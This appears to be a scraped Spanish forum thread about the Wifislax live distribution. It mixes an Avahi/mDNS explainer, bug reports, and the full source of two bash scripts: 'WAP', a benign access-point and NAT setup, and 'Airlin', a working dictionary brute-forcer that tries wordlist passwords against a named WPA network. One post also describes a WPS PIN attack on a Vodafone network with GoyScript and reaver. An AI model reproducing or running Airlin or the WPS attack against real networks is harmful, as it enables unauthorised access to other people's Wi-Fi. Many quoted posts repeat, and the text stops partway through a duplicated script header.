Avahi allows programs to publish and discover services and hosts running on a local network. For example, a user can plug their computer into a network and Avahi automatically finds printers to print to, files to look at and people to talk to, as well as advertising the network services running on the machine.
CitarAvahi allows programs to publish and discover services and hosts running on a local network. For example, a user can plug their computer into a network and Avahi automatically finds printers to print to, files to look at and people to talk to, as well as advertising the network services running on the machine.
Parece que es un demonio para descubrir automáticamente los servicios disponibles en red, a ver si alguien que lo use "de verdad" nos cuenta un poco sus virtudes ;)
Saludos
El programa AVAHI
Considerando una configuración de red común, como por ejemplo, una máquina que hace de router y varios ordenadores más.
Un servidor DHCP funcionando, lo que quiere decir que cuando enciendes un ordenador, éste le pide la dirección IP al router y ya está… ¡queda integrado a la red!.
No tiene que configurar nada, cualquier persona puede traer su portátil, encenderla y ya podrá salir a Internet.
¿Que problema tiene esto? ...
Pués que el router asignará a cada ordenador la dirección IP que le dé la gana.
Yo necesito saber las direcciones IP de cada ordenador para utilizar servicios como SSH, VNC, acceder al servidor web de mi red o simplemente para comprobar que un ordenador está encendido.
El paquete Avahi.
Demonio avahi mDNS/DNS-SD
Avahi es un completo marco de trabajo LPGL para Multicast DNS Service Discovery. Permite que los programas publiquen y descubran los servicios y hosts que funcionan en una red local sin configuración específica.
Por ejemplo puedes conectarte en una red y encontrar inmediatamente las impresoras para imprimir, archivos para mirar y gente para hablar.
Este paquete contiene el demonio Avahi que representa tu máquina en la red y permite que otras aplicaciones publiquen y resuelvan consultas mDNS/DNS-SD.
Una de las características de esta tecnología es permitir que cada com****dor anuncie su nombre en la red.
Ésto quiere decir que cada ordenador envía mensajes al resto diciendo “soy equipoX y tengo la dirección IP xxx.xxx.xxx.xxx”.
Entonces cuando "equipo3" quiera contactar con "master" ya va a conocer su dirección IP, porque "master" la ha difundido en la red.
Podré referirme a él simplemente usando su nombre, sin tener que saber la dirección IP que le ha asignada.
"master" siempre será "master", cualquiera sea la IP que tenga.
Configuración.
Necesitamos tener funcionando los siguientes paquetes. Se instalan automáticamente con Gnome durante la instalación de GNU/Linux.:
avahi-daemon = Debian lo instala por defecto.
libnss-mdns = también lo instala por defecto
Listo, ahora ya podrás llamar a las máquinas de tu red por su nombre en lugar de su dirección IP.
Para esto tenemos que poner el nombre de la máquina seguido de ".local".
NOTA:
En Debian viene activado y funcionando en forma predeterminada..
Vamos a probarlo.
Supongamos que tenemos varios ordenadores, uno se llama "master" y los otros "equipo1", "equipo2" y asi sucesivamente.
Prueba en modo gráfico:
Nos vamos al menú Aplicaciones - Herramientas de sistema - Herramientas de red, clik en la pestaña Ping donde introducimos el nombre de la máquina que queremos contactar, en este caso queremos ubicar a "master" desde "equipo3" asi:
master.local
y presionamos el botón Ping. Si logra conexión veremos las respuestas de los ping.
En modo texto:
Esto simplemente equivale a ejecutar desde una cónsola
$ ping master.local
En "master" tenemos instalado un servidor web. Para conectarnos, por ejemplo, desde "equipo3" al servidor web, ingresamos en la barra de direcciones del navegador web:
http://master.local/
y nos mostrará el archivo apache2-default o lo que tenemos en /var/www/ si no conservamos dicho archivo.
http://master.local/mi-pagina/
Para ver tu página web en el servidor "master".
Esto tiene la gran ventaja de que no hay que estar aprendiéndose las direcciones IP de las máquinas de tu red, basta sólo con saber el nombre de la máquina a la que te quieres conectar.
Hola
Cierto se me olvido comentar el pedazo de boooteador que lleva la live , es hasta bonito, y personalizado y pidiendo permisos de admin y logotipo y y y y y , y no falla
Lo único que al finalizar me lanza el caftelito típico de cuando usas una app portable " es posible que el software no se haya instalado completamente". Nos ha jodió como que no e instalado nada señor bill
Saludos
jaja
A mi también me sale eso, pero la verdad es que no tengo ni idea de como decirle al sistema que no hay nada que instalar xd
Alguna forma habrá de hacerlo porque por ejemplo yumi también es portable y no dice nada.. ya investigaré..
jaja
A mi también me sale eso, pero la verdad es que no tengo ni idea de como decirle al sistema que no hay nada que instalar xd
Alguna forma habrá de hacerlo porque por ejemplo yumi también es portable y no dice nada.. ya investigaré..
wifislax ~ # airmon-ng
Interface Chipset Driver
wlan1 Ralink RT2870/3070 rt2800usb - [phy3]
wifislax ~ # hostapd hostapd.conf
Configuration file: hostapd.conf
nl80211: Failed to set interface wlan1 into AP mode
nl80211 driver initialization failed.
jaja
A mi también me sale eso, pero la verdad es que no tengo ni idea de como decirle al sistema que no hay nada que instalar xd
Alguna forma habrá de hacerlo porque por ejemplo yumi también es portable y no dice nada.. ya investigaré..
¿Estás usando herramientas de Microsoft para compilar? Echa un vistazo a http://msdn.microsoft.com/en-us/library/dd371711%28v=vs.85%29.aspx (http://msdn.microsoft.com/en-us/library/dd371711%28v=vs.85%29.aspx)
Saludos
cierto es que se van depurando cosas, ya por lo menos no pierdo los interfaces con determinadas aplicaciones, también se ha quitado el molesto mensaje de samba cada vez que ejecutaba el kwrite desde consola.
pero hostapd sigue muertoCódigo: [Seleccionar]wifislax ~ # airmon-ng
Interface Chipset Driver
wlan1 Ralink RT2870/3070 rt2800usb - [phy3]
wifislax ~ # hostapd hostapd.conf
Configuration file: hostapd.conf
nl80211: Failed to set interface wlan1 into AP mode
nl80211 driver initialization failed.
hostapd /etc/hostapd/hostapd.conf
Lo he compilado desde el mismo codeblocks.
reiniciando la interface wlan1 athak_htc
Citar
Lo he compilado desde el mismo codeblocks.
Entonces echa un vistazo a http://forums.codeblocks.org/index.php/topic,6867.0.html (http://forums.codeblocks.org/index.php/topic,6867.0.html) para ver cómo añadir ese fichero MANIFEST con el que debería desaparecer el aviso, a ver si hay suerte!
Saludos
A ver, un manifest se lo puedo añadir con reshacker por ejemplo, eso no es problema, pero.. para que quiero añadirle un manifest?? xd
En los enlaces que me has pasado no pone nada de que eso solucione lo del mensaje de "este programa no se ha instalado correctamente"
modprobe ath9k_htc
Hola
Un bug detectado de momento ¿a que no sabéis con que herramienta? Una que le encanta a Warcry ¿donde andará este? A ver si saco un rato y le escaneo por que estar seguir que esta .
Cuando termine el tes paso lo que vea
edito
bueno despues de reproducirlo varias veces os cuento el error en GoyScript WPS
entorno: PAE con KDE en USB live, en limpio sin modulo alguno y con MD5 correcto, wlan0 Ar9285 - wlan1 ar9271
ejecuto GoyScriptWPS lanzo el ataque contra Vodafone con PIN conocido, perfecto saca el pin y wpa
seleccioino otra red, pin generico ( 7 concretamente) pasan los 7 y lanza reaver ya que el pin noesta entre los de la base. lo dejo unos cuantos pines y paro el proceso con ctrl+c.
selecciono otra vez vodafone con pin conocido y error
al intentar levantar la interface, la deja completamente inservible, la desconecta del sistema.Código: [Seleccionar]reiniciando la interface wlan1 athak_htc
y se acabo la fiesta no existe la interface en el sistema, no se puede levantar y no es reconocidad.
cierro Goy, desconecto y vuelvo a conectar y ya es reconocidad con "iwconfig" , abro goy y mismo problema a la primera.
desconecto y vuelvo a conectar y la levanto (ifconfig wlan1 up) y ahora si funciona. al seleccionar una segunda red para atacar, lanza una advertencia,
"hay 3 procesos que puede interferir en la interface, si no funciona prueba a cerrarlos, airodump-ng, aireplay y otra que no e apuntado". aun que el proceso termina con existo .
saludos
en la rc3 pasaba eso del goy ??
Vale solucionado cambiando la compatibilidad a XP SP2 (SP3 persiste el problema). Además mosqueaba que a algunos no les salga la alerta y a otros si.Citar
A ver, un manifest se lo puedo añadir con reshacker por ejemplo, eso no es problema, pero.. para que quiero añadirle un manifest?? xd
En los enlaces que me has pasado no pone nada de que eso solucione lo del mensaje de "este programa no se ha instalado correctamente"
Por lo que he estado leyendo, tienes que añadir un MANIFEST en el que indiques la compatibilidad, en el enlace de Microsoft que te pasé aparece:
Program Compatibility Assistant (PCA)
Windows 7: Applications with Compatibility section will not get the PCA mitigation.
(http://Program Compatibility Assistant (PCA)
Windows 7: Applications with Compatibility section will not get the PCA mitigation.)
Haz alguna prueba, a ver si etiquetando correctamente el 'compatibility' deja de aparecer el mensaje.
Saludos
Bueno perdona ya no pregunto nada
Pero no me mandes a la nevera 15 dias sin postear
a los que se les va la pinza con el chip ath9k_htc ( wifistation ,alfa negra , tp-link 722 etc )
probar con esto en la rc4
podeis si quereis cargarlo con el sistema en marcha ya..pero la tarjeta debereis desconectarla y conectar , para que cargue el firmware nuevo ...
para menos lios aconsejo meterlo amodules y reiniciar , con el modulo ya en la carpeta...
si lo habeis instalado -... usais "autoinstalar" ..y desconectar y recomentar el usb de la tarjeta.
Firmware-ath9k_htc-1.4-noarch-1sw.xzm (44 KB) http://www.multiupload.nl/8Q0NX1I358
a los que se les va la pinza con el chip ath9k_htc ( wifistation ,alfa negra , tp-link 722 etc )
probar con esto en la rc4
podeis si quereis cargarlo con el sistema en marcha ya..pero la tarjeta debereis desconectarla y conectar , para que cargue el firmware nuevo ...
para menos lios aconsejo meterlo amodules y reiniciar , con el modulo ya en la carpeta...
si lo habeis instalado -... usais "autoinstalar" ..y desconectar y recomentar el usb de la tarjeta.
Firmware-ath9k_htc-1.4-noarch-1sw.xzm (44 KB) http://www.multiupload.nl/8Q0NX1I358
sanson , el gestor te seguro que va igual de bien o mal que wicd , pero requiere estar un poco mas al tanto de el ...
recuerda editar la configuracion de conexion y restringir la conexion a solo una interface , o te vovleras majareta.
sanson , el gestor te seguro que va igual de bien o mal que wicd , pero requiere estar un poco mas al tanto de el ...
recuerda editar la configuracion de conexion y restringir la conexion a solo una interface , o te vovleras majareta.
yo siempre he sido un incondicional de wicd, de hecho mantengo el paquete wicd-kde para debian, pero nunca pude hacerlo funcionar con la puñetera eduroam y me vi obligado a pasarme a network-manager.
He de decir que ya no es lo que era, ahora funciona muy bien y de momento no tengo intención de volver a cambiar.
He añadido un Manifest al Wifislax Boot Installer con soporte para UAC y PAC, ¿podríais probarlo?
El fichero está en http://9bufp77zok.1fichier.com/en/ (http://9bufp77zok.1fichier.com/en/)
Saludos
EDITO: He añadido una segunda versión que exige privilegios de administrador, por si fuese más adecuado tenerlo así. El fichero está en http://4fyaamfxib.1fichier.com/en/ (http://4fyaamfxib.1fichier.com/en/)
He añadido un Manifest al Wifislax Boot Installer con soporte para UAC y PAC, ¿podríais probarlo?
El fichero está en http://9bufp77zok.1fichier.com/en/ (http://9bufp77zok.1fichier.com/en/)
Saludos
EDITO: He añadido una segunda versión que exige privilegios de administrador, por si fuese más adecuado tenerlo así. El fichero está en http://4fyaamfxib.1fichier.com/en/ (http://4fyaamfxib.1fichier.com/en/)
Pues... funciona!
jeje tenias razon y yo que no te hacía caso xd
Gracias ;)
Hola
¿has metido el paquete hostpad ???
#!/bin/bash
###############################################################################
# Fichero: WAP #
# Version: 1.0 #
# Autor: Warcry (warcry7474@hotmail.com) #
# Fecha: 15/NOV/2013 #
# #
# Agradecimientos: A todos los componentes de seguridadwireless.net #
# en especial a geminis_demon, USUARIONUEVO y sanson #
# ya que sin su ayuda este script no habria visto la luz #
# #
# El Autor no se responsabiliza del uso indebido que esta herramienta pueda #
# tener, ya que el usuario tiene la obligación de utilizarla siempre acorde #
# a la legislación vigente del país donde se utilice. #
# #
# Este programa es software libre; puedes redistribuirlo y/o modificarlo #
# bajo los terminos de la Licencia Publica General GNU (GPL) publicada #
# por la Free Software Foundation; en su version numero 3, o (bajo tu #
# criterio) la ultima version. Mira http://www.fsf.org/copyleft/gpl.txt #
# #
# Este programa se distribuye SIN GARANTIA de ningun tipo. #
# #
###############################################################################
#funcion que muestra el titulo
function mostrarheader(){
echo -e '\e[1;32m#########################################################'
echo -e '\e[1;32m# #'
echo -e '\e[1;32m#''\e[1;33m WAP' '\e[1;32m #'
echo -e '\e[1;32m#''\e[1;33m Warcry Access Point''\e[1;32m #'
echo -e '\e[1;32m# #'
echo -e '\e[1;32m#########################################################\e[0m'
}
# funcion que activa y configura todos los servicios
function activacion(){
# establecimiento configuracion dhcp
echo "default-lease-time 600;
max-lease-time 7200;
subnet 172.168.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 172.168.0.255;
option routers 172.168.0.1;
option domain-name-servers 8.8.8.8;
range 172.168.0.2 172.168.0.254;
}" > /tmp/dhcpd.conf
clear
mostrarheader
# activamos el ap en background
hostapd -B /tmp/hostapd.conf >/dev/null 2>&1
sleep 1
ifconfig $device 172.168.0.1 netmask 255.255.255.0
ifconfig $device mtu 1400
route add -net 172.168.0.0 netmask 255.255.255.0 gw 172.168.0.1
sleep 1
# configuracion de iptables
## borrado de reglas de iptables
iptables -F
iptables -X
iptables -Z
iptables -t nat -F
## establecemos politica por defecto
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -t nat -P PREROUTING ACCEPT
iptables -t nat -P POSTROUTING ACCEPT
# el localhost se deja
iptables -A INPUT -i lo -j ACCEPT
# al firewall tenemos acceso desde la red local
iptables -A INPUT -s 172.168.0.0/24 -i $device -j ACCEPT
# ahora hacemos enmascaramiento de la red local
iptables -t nat -A POSTROUTING -s 172.168.0.0/24 -o $device1 -j MASQUERADE
# activamos forwarding
echo "1" > /proc/sys/net/ipv4/ip_forward
# activamos el dhcp
xterm -iconic -e dhcpd -d -f -cf /tmp/dhcpd.conf $device
}
# funcion para resetear todos los interfaces
reset() {
if [ "$device" ]; then
# Identificamos el driver de la interface seleccionada
DRIVER="$(basename "$(ls -l "/sys/class/net/$device/device/driver")")"
if [ ! "$DRIVER" ] && [ -d "/sys/class/net/tiwlan0/wireless" ]; then
DRIVER="WiLink"
fi
# Se desmonta y se vuelve a montar el driver
rmmod -f "$DRIVER" >/dev/null 2>&1
sleep 1
modprobe "$DRIVER" >/dev/null 2>&1
sleep 3
# Se pone la interface "up" para evitar problemas
# con algunos adaptadores inalámbricos
ifconfig "$device" up >/dev/null 2>&1
fi
if [ "$device1" ]; then
blacklist-iface $device1 ON
# Identificamos el driver de la interface seleccionada
DRIVER="$(basename "$(ls -l "/sys/class/net/$device1/device/driver")")"
if [ ! "$DRIVER" ] && [ -d "/sys/class/net/tiwlan0/wireless" ]; then
DRIVER="WiLink"
fi
# Se desmonta y se vuelve a montar el driver
rmmod -f "$DRIVER" >/dev/null 2>&1
sleep 1
modprobe "$DRIVER" >/dev/null 2>&1
sleep 3
# Se pone la interface "up" para evitar problemas
# con algunos adaptadores inalámbricos
ifconfig "$device1" up >/dev/null 2>&1
fi
}
clear
mostrarheader
# comprobacion de usuario
if [ $(whoami) != "root" ]; then
echo -e '\e[1;31m
¡¡¡ Debes ser root para ejecutar WAP !!!
Prueba: sudo bash wap o sudo sh wap
\e[0m'
sleep 5
exit 1
fi
# seleccion de parametros
echo -e '\e[1;37m \e[0m'
# detectamos el inteface que esta conectado a internet
echo -e '\e[1;37m
detectando conexion a internet...
\e[0m'
sleep 1
if [ -z ]; then
device1=$(ip route show|awk '(NR == 1) { print $5}')
fi
# si no hay interface conectado a internet
if [ $device1 == "link" ]; then
echo -e '\e[1;31m
¡¡¡ No se encontró ningún interface conectado a internet !!!
No se puede continuar.
\e[0m'
sleep 5
exit 1
fi
# si hay interface conectado a internet
echo -e '\e[1;36m
se ha seleccionado \e[0m' $device1
sleep 2
clear
mostrarheader
echo -e '\e[1;34m
WAP es una herramienta para crear un punto de acceso con
una interface wifi y proporcionar internet mediante un
puente con otra interface de tu pc que previamente este
conectada a internet mediante un gestor de conexion como wicd
\e[0m'
# crea lista con los interfaces wifi del sistema
if [ -z ]; then
interfaceList=$(iwconfig 2>/dev/null |grep "802.11" |grep -v Monitor |grep -v $device1 |awk '{print $1}')
fi
# si no hay interfaces wireless
echo -e '\e[1;36m'
if [ -z "$interfaceList" ]; then
echo -e '\e[1;31m
¡¡¡ No se encontró ningún interface wireless o en mode Managed !!!
No se puede continuar.
\e[0m'
sleep 5
exit 1
fi
echo
# crea array con dispositivos WiFi existentes
i=0
for interface in $interfaceList; do
if [ -z "`iwconfig 2>/dev/null |grep -A1 $interface|grep -i "Mode:Monitor"`" ]; then
deviceList[i]=$interface
i=`expr $i + 1`
fi
done
# muestra menu para elegir dispositivo
echo -e '\e[1;37m Selecciona el número de dispositivo WiFi que quieres utilizar
para crear el punto de acceso:\n\e[0m'
echo -e '\e[1;36m\tINTERFACE\tDRIVER\t\tFABRICANTE
\e[0m'
i=0
for device in ${deviceList[@]}; do
DRIVER="$(basename "$(ls -l "/sys/class/net/$device/device/driver")")"
FABRICANTE="$(macchanger -s $device|head -1|cut -d' ' -f6-)"
echo -e " [$i]\t$device\t\t$DRIVER\t$FABRICANTE"
i=`expr $i + 1` #let i=$i+1
done
echo -e "\n"
# read -s -N 1 n #leer un caracter en n, sin esperar intro -N 1, sin eco -s
read n #leer un caracter en n, sin esperar intro -N 1, sin eco -s
device=${deviceList[n]}
echo -e '\e[1A\e[1;36mHas seleccionado: '$device "espera...."
# proceso de limpieza
echo "
Preparando dispositivo....
"
# Eliminando interfaces en modo monitor
interfaces=$(ifconfig|awk '/^mon/ {print $1}')
if [ "$interfaces" != "" ]; then
for monx in $interfaces; do
airmon-ng stop $monx >/dev/null 2>&1
done
fi
ifconfig $device down >/dev/null 2>&1
ifconfig $device up >/dev/null 2>&1
sleep 1
clear
mostrarheader
# definimos el nombre del ap
echo -e '\e[1;31m
Selección de Essid (nombre de la red de tu Access Point)
\e[0m''\e[1;37mejemplo:\e[0m' '\e[1;36mPrueba_AP\e[0m'
echo -e '\e[1;37m
Teclea el Essid
\e[0m'
read red
clear
mostrarheader
# seleccionamos el canal que utilizara nuestro ap
echo -e '\e[1;31m
Selección de canal (si se esta utilizando otro interface wifi para obtener
internet se recomienda dejar unos 5 canales de separacion)
\e[0m''\e[1;37mejemplo:\e[0m' '\e[1;36m10\e[0m'
echo -e '\e[1;37m
Teclea el canal (1-11)
\e[0m'
read canal
clear
mostrarheader
echo -e '\e[1;31m
Selección de cifrado
\e[0m''\e[1;37mejemplo:\e[0m' '\e[1;36m 2\e[0m'
echo -e '\e[1;31m
[1] OPEN
[2] WEP
[3] WPA
[4] WPA2
[5] WPA/WPA2
[6] WPA/WPA2 con WPS
\e[0m'
echo -e '\e[1;37m
Teclea el numero de cifrado que deseas
\e[0m'
read cifrado
case $cifrado in
1 ) echo "# Define interface
interface=$device
# Select driver
driver=nl80211
# Set access point name
ssid=$red
# Set access point harware mode to 802.11g
hw_mode=g
# Set WIFI channel (can be easily changed)
channel=$canal" > /tmp/hostapd.conf
activacion & continue >/dev/null 2>&1;;
2 ) echo -e '\e[1;37m
Teclea la clave wep (10 o 26 caracteres hexadecimales que no sean todo ceros)
ejemplo 1a2b3c4d5e
\e[0m'
read wepkey
echo "# Define interface
interface=$device
# Select driver
driver=nl80211
# Set access point name
ssid=$red
# Set access point harware mode to 802.11g
hw_mode=g
# Set WIFI channel (can be easily changed)
channel=$canal
# Enable WEP
wep_default_key=0
wep_key0=$wepkey" > /tmp/hostapd.conf
activacion & continue >/dev/null 2>&1;;
3 ) echo -e '\e[1;37m
Teclea la clave wpa (entre 8 y 63 caracteres)
\e[0m'
read wpakey
echo "# Define interface
interface=$device
# Select driver
driver=nl80211
# Set access point name
ssid=$red
# Set access point harware mode to 802.11g
hw_mode=g
# Set WIFI channel (can be easily changed)
channel=$canal
# Enable WPA2 only (1 for WPA, 2 for WPA2, 3 for WPA + WPA2)
wpa=1
wpa_passphrase=$wpakey" > /tmp/hostapd.conf
activacion & continue >/dev/null 2>&1;;
4 ) echo -e '\e[1;37m
Teclea la clave wpa (entre 8 y 63 caracteres)
\e[0m'
read wpakey
echo "# Define interface
interface=$device
# Select driver
driver=nl80211
# Set access point name
ssid=$red
# Set access point harware mode to 802.11g
hw_mode=g
# Set WIFI channel (can be easily changed)
channel=$canal
# Enable WPA2 only (1 for WPA, 2 for WPA2, 3 for WPA + WPA2)
wpa=2
wpa_passphrase=$wpakey" > /tmp/hostapd.conf
activacion & continue >/dev/null 2>&1;;
5 ) echo -e '\e[1;37m
Teclea la clave wpa (entre 8 y 63 caracteres)
\e[0m'
read wpakey
echo "# Define interface
interface=$device
# Select driver
driver=nl80211
# Set access point name
ssid=$red
# Set access point harware mode to 802.11g
hw_mode=g
# Set WIFI channel (can be easily changed)
channel=$canal
# Enable WPA2 only (1 for WPA, 2 for WPA2, 3 for WPA + WPA2)
wpa=3
wpa_passphrase=$wpakey" > /tmp/hostapd.conf
activacion & continue >/dev/null 2>&1;;
6 ) echo -e '\e[1;37m
Teclea la clave wpa (entre 8 y 63 caracteres)
\e[0m'
read wpakey
echo -e '\e[1;37m
Teclea el pin (ejemplo 12345670)
\e[0m'
read pin
echo "# Define interface
interface=$device
# Select driver
driver=nl80211
# Set access point name
ssid=$red
# Set access point harware mode to 802.11g
hw_mode=g
# Set WIFI channel (can be easily changed)
channel=$canal
# Enable WPA2 only (1 for WPA, 2 for WPA2, 3 for WPA + WPA2)
wpa=3
wpa_passphrase=$wpakey
# Enable WPS
eap_server=1
wps_state=2
ap_pin=$pin" > /tmp/hostapd.conf
activacion & continue >/dev/null 2>&1;;
esac
sleep 2
clear
mostrarheader
echo -e '\e[1;31m
Pulsa cualquier tecla para finalizar
¡¡¡ NO CIERRES LA VENTANA DIRECTAMENTE
PRESIONA CUALQUIER TECLA PARA FINALIZAR
O NO SE EJECUTARA LA LIMPIEZA, LO QUE PUEDE
PROVOCAR CONFLICTOS CON OTRAS APLICACIONES !!!
\e[0m'
read -N 1
# eliminando demonios y archivos temporales creados
killall dhcpd
killall hostapd
killall dhcpcd
rm -f /tmp/dhcpd.conf
rm -f /tmp/hostapd.conf
# eliminando reglas de iptables
iptables -F
iptables -X
iptables -Z
iptables -t nat -F
# eliminando forwarding
echo "0" > /proc/sys/net/ipv4/ip_forward
# reseteando interfaces
reset
blacklist-iface $device1 OFF
exit
#Fin
por lo unico que estoy un poco trite ,es por que casi estoy en el borde del abismo , ...en cuanto a lo que es un livecd , que como livecd debe entrar en un cd .... :'(
@sason
el gkrell si esta , pero no tiene la entrada en los menus ??? ??? ???
desde consola es un poco royo ejecutarlo.
gkrellm
cierto es que se van depurando cosas, ya por lo menos no pierdo los interfaces con determinadas aplicaciones, también se ha quitado el molesto mensaje de samba cada vez que ejecutaba el kwrite desde consola
wifislax ~ # kwrite /usr/bin/airssl.sh
kwrite(7185) KSambaSharePrivate::findSmbConf: KSambaShare: Could not find smb.conf!
blacklist-iface wlan1 ON
Citarcierto es que se van depurando cosas, ya por lo menos no pierdo los interfaces con determinadas aplicaciones, también se ha quitado el molesto mensaje de samba cada vez que ejecutaba el kwrite desde consolaCódigo: [Seleccionar]wifislax ~ # kwrite /usr/bin/airssl.sh
kwrite(7185) KSambaSharePrivate::findSmbConf: KSambaShare: Could not find smb.conf!
sigue el molesto mensaje
Ahora me tengo que ir pero lo miraré mas tarde.
Mientras tanto si quieres desbloquear la interface puedes hacerlo ejecutando:Código: [Seleccionar]blacklist-iface wlan1 ON
#!/bin/bash
###############################################################################
# Fichero: Airlin #
# Fecha: 01/Dic/2012 #
# Version: 1.0.1 #
# Autor: Warcry (warcry7474@hotmail.com) #
# #
# Agradecimientos: Especial agradecimiento a Berni69 (www.bitsdelocos.es) #
# y Niroz, que me han ayudado en el desarrollo #
# #
# y a todos los componentes del equipo de #
# www.seguridadwirless.net #
# #
# El Autor no se responsabiliza del uso indebido que esta herramienta pueda #
# tener, ya que el usuario tiene la obligación de utilizarla siempre acorde #
# a la legislación vigente del país donde se utilice. #
# #
# Este programa es software libre; puedes redistribuirlo y/o modificarlo #
# bajo los terminos de la Licencia Publica General GNU (GPL) publicada #
# por la Free Software Foundation; en su version numero 3, o (bajo tu #
# criterio) la ultima version. Mira http://www.fsf.org/copyleft/gpl.txt #
# #
# Este programa se distribuye SIN GARANTIA de ningun tipo. #
# #
###############################################################################
function mostrarheader(){
echo -e '\e[1;32m#########################################################'
echo -e '\e[1;32m# #'
echo -e '\e[1;32m#''\e[1;33m Airlin' '\e[1;32m #'
echo -e '\e[1;32m#''\e[1;33m by Warcry''\e[1;32m #'
echo -e '\e[1;32m# #'
echo -e '\e[1;32m#########################################################\e[0m'
}
Salir() {
blacklist-iface "$device" ON >/dev/null 2>&1
exit
}
trap "Salir" SIGHUP SIGILL
clear
mostrarheader
#comprobacion de usuario
if [ $(whoami) != "root" ]; then
echo -e '\e[1;31m
¡¡¡ Debes ser root para ejecutar Airlin !!!
Prueba: sudo bash Airlin o sudo sh Airlin
\e[0m'
Salir
fi
echo -e '\e[1;34m
Airlin es una herramienta de recuperación de contraseñas WPA/WPA2
Para la recuperación de contraseñas WEP puedes usar Wlanreaver
\e[0m'
#variables
red=essid
ret=retardo
dic=dirname
key=line
#seleccion de parametros
echo -e '\e[1;37m \e[0m'
#crea lista con los interfaces wifi del sistema
if [ -z $1 ]; then
interfaceList=$(iwconfig 2>/dev/null |grep "802.11" |grep -v Monitor |awk '{print $1}')
else
interfaceList=$1; #si se indicó el dispositivo wifi como parametro de entrada
fi
echo -e '\e[1;31m No se muestran interfaces en modo monitor (como mon0).
\t\tAirlin no los utiliza.\n\e[0m'
if [ -z "$interfaceList" ]; then
echo -e '\e[1;31m
¡¡¡ No se encontró ningún interface wireless o en mode Managed !!!
No se puede continuar.
\e[0m'
exit 1
fi
echo
#crea array con dispositivos WiFi existentes
i=0
for interface in $interfaceList; do
if [ -z "`iwconfig 2>/dev/null |grep -A1 $interface|grep -i "Mode:Monitor"`" ]; then
deviceList[i]=$interface
i=`expr $i + 1`
fi
done
#muestra menu para elegir dispositivo
echo -e "Selecciona el número de dispositivo WiFi que quieres utilizar:\n"
i=0
for device in ${deviceList[@]}; do
echo " ["$i"]" $device
i=`expr $i + 1` #let i=$i+1
done
echo -e "\n"
#read -s -N 1 n #leer un caracter en n, sin esperar intro -N 1, sin eco -s
read n #leer un caracter en n, sin esperar intro -N 1, sin eco -s
device=${deviceList[n]}
echo -e '\e[1A\e[1;36mHas seleccionado: '$device "espera...."
[ "$(which blacklist-iface)" ] && blacklist-iface $device OFF >/dev/null 2>&1
[ "$(which reset-iface)" ] && reset-iface $device
sleep 2 #pausa dramatica XD
clear
mostrarheader
echo -e '\e[1;37m
Selección de Essid (nombre de la red a la que quieres conectarte)
ejemplo:\e[0m' '\e[1;36mWLAN_A1F4\e[0m'
echo -e '\e[1;31m
¡¡¡ Recuerda que tienes que hacer coincidir el nombre completo
respetando los guiones, mayúsculas y minúsculas !!!\e[0m'
echo -e '\e[1;37m
Teclea el Essid\e[0m'
read red
clear
mostrarheader
echo -e '\e[1;37m \e[0m'
echo -e '\e[1;37m
Selección del diccionario:
Si estas utilizando Wifislax y tenemos el diccionario en el
escritorio, la ruta seria:
ejemplo:\e[0m' '\e[1;36m /root/Desktop/diccionario.txt\e[0m'
echo -e '\e[1;31m
¡¡¡ Recuerda que tienes que respetar las mayúsculas y minúsculas
de la ruta o te dirá que el archivo no existe,
también tienes que respetar el nombre del diccionario con su
extensión, en el ejemplo es: diccionario.txt !!!\e[0m'
echo -e '\e[1;37m
Teclea la ruta del diccionario\e[0m'
read dirname
if [ -f $dirname ]; then continue
else
clear
mostrarheader
echo -e '\e[1;31m
¡¡¡ No se encontró ningún diccionario en la ruta especificada !!!
No se puede continuar.
\e[0m'
Salir
fi
clear
mostrarheader
echo -e '\e[1;37m
Selección de retardo
ejemplo:\e[0m' '\e[1;36m 5\e[0m'
echo -e '\e[1;31m
¡¡¡ Recuerda que el retardo es el tiempo en segundos que tarda en
realizarse cada intento, un retardo demasiado bajo puede ocasionar
que no de tiempo a negociar la clave y provoque que salte la
clave, aunque sea la correcta !!!\e[0m'
echo -e '\e[1;37m
Teclea retardo\e[0m'
read ret
#proceso de limpieza
echo "
Preparando dispositivo...."
echo -e '\e[0;30m ';
ifconfig $device down
killall -9 dhcpcd 2>/dev/null
killall -9 wpa_supplicant 2>/dev/null
rm -rf $/var/run/dhcpcd 2>/dev/null
rm /var/run/dhcpcd-wlan0.pid 2>/dev/null
sleep 1
ifconfig $device up
sleep 3
#establecimiento de conexion
for line in $(cat $dirname); do
killall -9 wpa_supplicant 2>/dev/null
rm /etc/wpa_supplicant.conf
touch /etc/wpa_supplicant.conf
rm airlintmp
clear
mostrarheader
echo -e '\e[1;35m
Probando clave........\e[0m''\e[1;33m '$line '\e[0;30m '
echo -e "\n\n\n "
wpa_passphrase $red $line >> /etc/wpa_supplicant.conf
wpa_supplicant -i$device -c/etc/wpa_supplicant.conf -f airlintmp 2>/dev/null & sleep $ret ;
if ( grep -i 'WPA: Key negotiation completed' airlintmp ) ; then
killall -9 wpa_supplicant 2>/dev/null '\e[0;30m '
clear
mostrarheader
echo -e '\e[1;34m
Clave encontrada:\e[0m' '\e[1;36m '$line '\e[0;30m '
echo -e '\e[1;33m
¡¡¡ FELICIDADES !!!\e[0m\n\n''\e[0;30m ' ;
break;
fi
done #for
if [ -z "`grep -i 'WPA: Key negotiation completed' airlintmp`" ]; then
killall -9 wpa_supplicant 2>/dev/null '\e[0;30m '
clear
mostrarheader
echo -e '\e[1;31m
La clave no se encuentra en este diccionario.
\e[0m''\e[0;30m '
fi
rm /etc/wpa_supplicant.conf 2>/dev/null
touch /etc/wpa_supplicant.conf 2>/dev/null
rm airlintmp 2>/dev/null
Salir
#END
#!/bin/bash
###############################################################################
# Fichero: WAP #
# Version: 1.0 #
# Autor: Warcry (warcry7474@hotmail.com) #
# Fecha: 15/NOV/2013 #
# #
# Agradecimientos: A todos los componentes de seguridadwireless.net #
# en especial a geminis_demon, USUARIONUEVO y sanson #
# ya que sin su ayuda este script no habria visto la luz #
# #
# El Autor no se responsabiliza del uso indebido que esta herramienta pueda #
# tener, ya que el usuario tiene la obligación de utilizarla siempre acorde #
# a la legislación vigente del país donde se utilice. #
# #
# Este programa es software libre; puedes redistribuirlo y/o modificarlo #
# bajo los terminos de la Licencia Publica General GNU (GPL) publicada #
# por la Free Software Foundation; en su version numero 3, o (bajo tu #
# criterio) la ultima version. Mira http://www.fsf.org/copyleft/gpl.txt #
# #
